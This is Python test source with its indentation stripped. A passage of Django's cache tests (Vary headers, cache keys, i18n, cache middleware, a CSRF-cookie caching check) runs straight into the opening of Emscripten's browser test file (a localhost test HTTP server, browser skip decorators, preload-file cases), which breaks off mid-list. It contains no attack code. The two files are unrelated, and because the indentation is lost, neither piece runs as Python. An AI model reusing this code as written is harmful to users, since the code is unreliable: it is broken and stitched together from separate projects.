('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
response = HttpResponse()
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
key_prefix = 'localprefix'
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
)
def test_cache_key_varies_by_url(self):
"""
get_cache_key keys differ by fully-qualified URL instead of path
"""
request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
learn_cache_key(request1, HttpResponse())
request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
learn_cache_key(request2, HttpResponse())
self.assertNotEqual(get_cache_key(request1), get_cache_key(request2))
def test_learn_cache_key(self):
request = self.factory.head(self.path)
response = HttpResponse()
response['Vary'] = 'Pony'
# Make sure that the Vary header is added to the key hash
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_patch_cache_control(self):
tests = (
# Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
(None, {'private': True}, {'private'}),
# Test whether private/public attributes are mutually exclusive
('private', {'private': True}, {'private'}),
('private', {'public': True}, {'public'}),
('public', {'public': True}, {'public'}),
('public', {'private': True}, {'private'}),
('must-revalidate,max-age=60,private', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
('must-revalidate,max-age=60,public', {'private': True}, {'must-revalidate', 'max-age=60', 'private'}),
('must-revalidate,max-age=60', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
)
cc_delim_re = re.compile(r'\s*,\s*')
for initial_cc, newheaders, expected_cc in tests:
response = HttpResponse()
if initial_cc is not None:
response['Cache-Control'] = initial_cc
patch_cache_control(response, **newheaders)
parts = set(cc_delim_re.split(response['Cache-Control']))
self.assertEqual(parts, expected_cc)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix',
},
},
)
class PrefixedCacheUtils(CacheUtils):
pass
@override_settings(
CACHE_MIDDLEWARE_SECONDS=60,
CACHE_MIDDLEWARE_KEY_PREFIX='test',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
)
class CacheHEADTest(SimpleTestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_head_caches_correctly(self):
test_content = 'test content'
request = self.factory.head(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
def test_head_with_cached_get(self):
test_content = 'test content'
request = self.factory.get(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
LANGUAGES=[
('en', 'English'),
('es', 'Spanish'),
],
)
class CacheI18nTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
def check_accept_language_vary(self, accept_language, vary, reference_key):
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = vary
key = learn_cache_key(request, response)
key2 = get_cache_key(request)
self.assertEqual(key, reference_key)
self.assertEqual(key2, reference_key)
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation_accept_language(self):
lang = translation.get_language()
self.assertEqual(lang, 'en')
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = 'accept-encoding'
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
self.check_accept_language_vary(
'en-us',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'en-US',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8',
'accept-encoding, accept-language, cookie',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8,ko;q=0.6',
'accept-language, cookie, accept-encoding',
key
)
self.check_accept_language_vary(
'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
'accept-encoding, cookie, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
'accept-language, accept-encoding, cookie',
key
)
self.check_accept_language_vary(
'ko;q=1.0,en;q=0.5',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'ko, en',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR, en-US',
'accept-encoding, accept-language, cookie',
key
)
@override_settings(USE_I18N=False, USE_L10N=True, USE_TZ=False)
def test_cache_key_i18n_formatting(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when formatting is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_i18n_timezone(self):
request = self.factory.get(self.path)
# This is tightly coupled to the implementation,
# but it's the most straightforward way to test the key.
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False)
def test_cache_key_no_i18n(self):
request = self.factory.get(self.path)
lang = translation.get_language()
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_with_non_ascii_tzname(self):
# Regression test for #17476
class CustomTzName(timezone.UTC):
name = ''
def tzname(self, dt):
return self.name
request = self.factory.get(self.path)
response = HttpResponse()
with timezone.override(CustomTzName()):
CustomTzName.name = 'Hora estándar de Argentina'.encode('UTF-8') # UTF-8 string
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
CustomTzName.name = 'Hora estándar de Argentina' # unicode
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
USE_I18N=True,
)
def test_middleware(self):
def set_cache(request, lang, msg):
translation.activate(lang)
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
# cache with non empty request.GET
request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# first access, cache must return None
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Check for cache with QUERY_STRING'
response.content = content
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# cache must return content
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
# different QUERY_STRING, cache must be empty
request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# i18n tests
en_message = "Hello world!"
es_message = "Hola mundo!"
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# Check that we can recover the cache
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, en_message.encode())
# Check that we use etags
self.assertTrue(get_cache_data.has_header('ETag'))
# Check that we can disable etags
with self.settings(USE_ETAGS=False):
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertFalse(get_cache_data.has_header('ETag'))
# change the session language and set content
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'es', es_message)
# change again the language
translation.activate('en')
# retrieve the content from cache
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, en_message.encode())
# change again the language
translation.activate('es')
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, es_message.encode())
# reset the language
translation.deactivate()
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
)
def test_middleware_doesnt_cache_streaming_response(self):
request = self.factory.get(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# This test passes on Python < 3.3 even without the corresponding code
# in UpdateCacheMiddleware, because pickling a StreamingHttpResponse
# fails (http://bugs.python.org/issue14288). LocMemCache silently
# swallows the exception and doesn't store the response in cache.
content = ['Check for cache with streaming content.']
response = StreamingHttpResponse(content)
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix'
},
},
)
class PrefixedCacheI18nTest(CacheI18nTest):
pass
def hello_world_view(request, value):
return HttpResponse('Hello World %s' % value)
def csrf_view(request):
return HttpResponse(csrf(request)['csrf_token'])
@override_settings(
CACHE_MIDDLEWARE_ALIAS='other',
CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
CACHE_MIDDLEWARE_SECONDS=30,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other',
'TIMEOUT': '1',
},
},
)
class CacheMiddlewareTest(SimpleTestCase):
def setUp(self):
super(CacheMiddlewareTest, self).setUp()
self.factory = RequestFactory()
self.default_cache = caches['default']
self.other_cache = caches['other']
def tearDown(self):
self.default_cache.clear()
self.other_cache.clear()
super(CacheMiddlewareTest, self).tearDown()
def test_constructor(self):
"""
Ensure the constructor is correctly distinguishing between usage of CacheMiddleware as
Middleware vs. usage of CacheMiddleware as view decorator and setting attributes
appropriately.
"""
# If no arguments are passed in construction, it's being used as middleware.
middleware = CacheMiddleware()
# Now test object attributes against values defined in setUp above
self.assertEqual(middleware.cache_timeout, 30)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
# If arguments are being passed in construction, it's being used as a decorator.
# First, test with "defaults":
as_view_decorator = CacheMiddleware(cache_alias=None, key_prefix=None)
self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30
self.assertEqual(as_view_decorator.key_prefix, '')
# Value of DEFAULT_CACHE_ALIAS from django.core.cache
self.assertEqual(as_view_decorator.cache_alias, 'default')
# Next, test with custom values:
as_view_decorator_with_custom = CacheMiddleware(cache_timeout=60, cache_alias='other', key_prefix='foo')
self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')
def test_middleware(self):
middleware = CacheMiddleware()
prefix_middleware = CacheMiddleware(key_prefix='prefix1')
timeout_middleware = CacheMiddleware(cache_timeout=1)
request = self.factory.get('/view/')
# Put the request through the request middleware
result = middleware.process_request(request)
self.assertIsNone(result)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
response = middleware.process_response(request, response)
# Repeating the request should result in a cache hit
result = middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
# The same request through a different middleware won't hit
result = prefix_middleware.process_request(request)
self.assertIsNone(result)
# The same request with a timeout _will_ hit
result = timeout_middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
def test_view_decorator(self):
# decorate the same view with different cache decorators
default_view = cache_page(3)(hello_world_view)
default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
explicit_default_view = cache_page(3, cache='default')(hello_world_view)
explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
other_view = cache_page(1, cache='other')(hello_world_view)
other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)
request = self.factory.get('/view/')
# Request the view once
response = default_view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
# Request again -- hit the cache
response = default_view(request, '2')
self.assertEqual(response.content, b'Hello World 1')
# Requesting the same view with the explicit cache should yield the same result
response = explicit_default_view(request, '3')
self.assertEqual(response.content, b'Hello World 1')
# Requesting with a prefix will hit a different cache key
response = explicit_default_with_prefix_view(request, '4')
self.assertEqual(response.content, b'Hello World 4')
# Hitting the same view again gives a cache hit
response = explicit_default_with_prefix_view(request, '5')
self.assertEqual(response.content, b'Hello World 4')
# And going back to the implicit cache will hit the same cache
response = default_with_prefix_view(request, '6')
self.assertEqual(response.content, b'Hello World 4')
# Requesting from an alternate cache won't hit cache
response = other_view(request, '7')
self.assertEqual(response.content, b'Hello World 7')
# But a repeated hit will hit cache
response = other_view(request, '8')
self.assertEqual(response.content, b'Hello World 7')
# And prefixing the alternate cache yields yet another cache entry
response = other_with_prefix_view(request, '9')
self.assertEqual(response.content, b'Hello World 9')
# But if we wait a couple of seconds...
time.sleep(2)
# ... the default cache will still hit
caches['default']
response = default_view(request, '11')
self.assertEqual(response.content, b'Hello World 1')
# ... the default cache with a prefix will still hit
response = default_with_prefix_view(request, '12')
self.assertEqual(response.content, b'Hello World 4')
# ... the explicit default cache will still hit
response = explicit_default_view(request, '13')
self.assertEqual(response.content, b'Hello World 1')
# ... the explicit default cache with a prefix will still hit
response = explicit_default_with_prefix_view(request, '14')
self.assertEqual(response.content, b'Hello World 4')
# .. but a rapidly expiring cache won't hit
response = other_view(request, '15')
self.assertEqual(response.content, b'Hello World 15')
# .. even if it has a prefix
response = other_with_prefix_view(request, '16')
self.assertEqual(response.content, b'Hello World 16')
def test_sensitive_cookie_not_cached(self):
"""
Django must prevent caching of responses that set a user-specific (and
maybe security sensitive) cookie in response to a cookie-less request.
"""
csrf_middleware = CsrfViewMiddleware()
cache_middleware = CacheMiddleware()
request = self.factory.get('/view/')
self.assertIsNone(cache_middleware.process_request(request))
csrf_middleware.process_view(request, csrf_view, (), {})
response = csrf_view(request)
response = csrf_middleware.process_response(request, response)
response = cache_middleware.process_response(request, response)
# Inserting a CSRF cookie in a cookie-less request prevented caching.
self.assertIsNone(cache_middleware.process_request(request))
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class TestWithTemplateResponse(SimpleTestCase):
"""
Tests various headers w/ TemplateResponse.
Most are probably redundant since they manipulate the same object
anyway but the Etag header is 'special' because it relies on the
content being complete (which is not necessarily always the case
with a TemplateResponse)
"""
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
)
@override_settings(USE_ETAGS=False)
def test_without_etag(self):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertFalse(response.has_header('ETag'))
@override_settings(USE_ETAGS=True)
def test_with_etag(self):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertTrue(response.has_header('ETag'))
class TestMakeTemplateFragmentKey(SimpleTestCase):
def test_without_vary_on(self):
key = make_template_fragment_key('a.fragment')
self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')
def test_with_one_vary_on(self):
key = make_template_fragment_key('foo', ['abc'])
self.assertEqual(key,
'template.cache.foo.900150983cd24fb0d6963f7d28e17f72')
def test_with_many_vary_on(self):
key = make_template_fragment_key('bar', ['abc', 'def'])
self.assertEqual(key,
'template.cache.bar.4b35f12ab03cec09beec4c21b2d2fa88')
def test_proper_escaping(self):
key = make_template_fragment_key('spam', ['abc:def%'])
self.assertEqual(key,
'template.cache.spam.f27688177baec990cdf3fbd9d9c3f469')
class CacheHandlerTest(SimpleTestCase):
def test_same_instance(self):
"""
Attempting to retrieve the same alias should yield the same instance.
"""
cache1 = caches['default']
cache2 = caches['default']
self.assertIs(cache1, cache2)
def test_per_thread(self):
"""
Requesting the same alias from separate threads should yield separate
instances.
"""
c = []
def runner():
c.append(caches['default'])
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertIsNot(c[0], c[1])
|
test_browser.py
|
# coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
from __future__ import print_function
import argparse
import json
import multiprocessing
import os
import random
import re
import shlex
import shutil
import subprocess
import sys
import time
import unittest
import webbrowser
import zlib
from runner import BrowserCore, path_from_root, has_browser, EMTEST_BROWSER, no_fastcomp, no_wasm_backend, create_test_file, parameterized
from tools import system_libs
from tools.shared import PYTHON, EMCC, WINDOWS, FILE_PACKAGER, PIPE, SPIDERMONKEY_ENGINE, JS_ENGINES
from tools.shared import try_delete, Building, run_process, run_js
try:
from http.server import BaseHTTPRequestHandler, HTTPServer
except ImportError:
# Python 2 compatibility
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
if sys.version_info.major == 2:
from urllib import urlopen
else:
from urllib.request import urlopen
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if s.path == '/':
s.sendheaders()
elif not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
def shell_with_script(shell_file, output_file, replacement):
with open(path_from_root('src', shell_file)) as input:
with open(output_file, 'w') as output:
output.write(input.read().replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower()
def no_chrome(note='chrome is not supported'):
if is_chrome():
return unittest.skip(note)
return lambda f: f
def is_firefox():
return EMTEST_BROWSER and 'firefox' in EMTEST_BROWSER.lower()
def no_firefox(note='firefox is not supported'):
if is_firefox():
return unittest.skip(note)
return lambda f: f
def no_swiftshader(f):
def decorated(self):
if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER:
self.skipTest('not compatible with swiftshader')
return f(self)
return decorated
def requires_threads(f):
def decorated(self, *args, **kwargs):
if os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set')
return f(self, *args, **kwargs)
return decorated
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
requires_offscreen_canvas = unittest.skipIf(os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'), "This test requires a browser with OffscreenCanvas")
class browser(BrowserCore):
@classmethod
def setUpClass(cls):
super(browser, cls).setUpClass()
cls.browser_timeout = 60
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once
# system JS libraries are no longer automatically linked to anymore.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL=1', '-lGL']) # is the default anyhow
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = 'src.cpp'
html_file = 'src.html'
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
self.compile_btest(['src.cpp', '-o', 'src.html', '-g4'])
self.assertExists(html_file)
self.assertExists('src.wasm.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step
through and see the print (best to run with EMTEST_SAVE_DIR=1 for the reload).
''')
@no_wasm_backend('wasm source maps')
def test_emscripten_log(self):
# TODO: wasm support for source maps. emscripten_loadSourceMap looks at $HTML.map but it should be $NAME.wasm.map.
src = 'src.cpp'
create_test_file(src, self.with_report_result(open(path_from_root('tests', 'emscripten_log', 'emscripten_log.cpp')).read()))
self.compile_btest([src, '--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-g', '-o', 'page.html', '-s', 'DEMANGLE_SUPPORT=1', '-s', 'WASM=0'])
self.run_browser('page.html', None, '/report_result?1')
def build_native_lzma(self):
lzma_native = path_from_root('third_party', 'lzma.js', 'lzma-native')
if os.path.isfile(lzma_native) and os.access(lzma_native, os.X_OK):
return
cwd = os.getcwd()
try:
os.chdir(path_from_root('third_party', 'lzma.js'))
# On Windows prefer using MinGW make if it exists, otherwise fall back to hoping we have cygwin make.
if WINDOWS and Building.which('mingw32-make'):
run_process(['doit.bat'])
else:
run_process(['sh', './doit.sh'])
finally:
os.chdir(cwd)
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
absolute_src_path3 = os.path.join(self.get_dir(), 'some@file.txt').replace('\\', '/')
open(absolute_src_path3, 'w').write('''load me right before running the code please''')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT(result);
return 0;
}
''' % path))
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
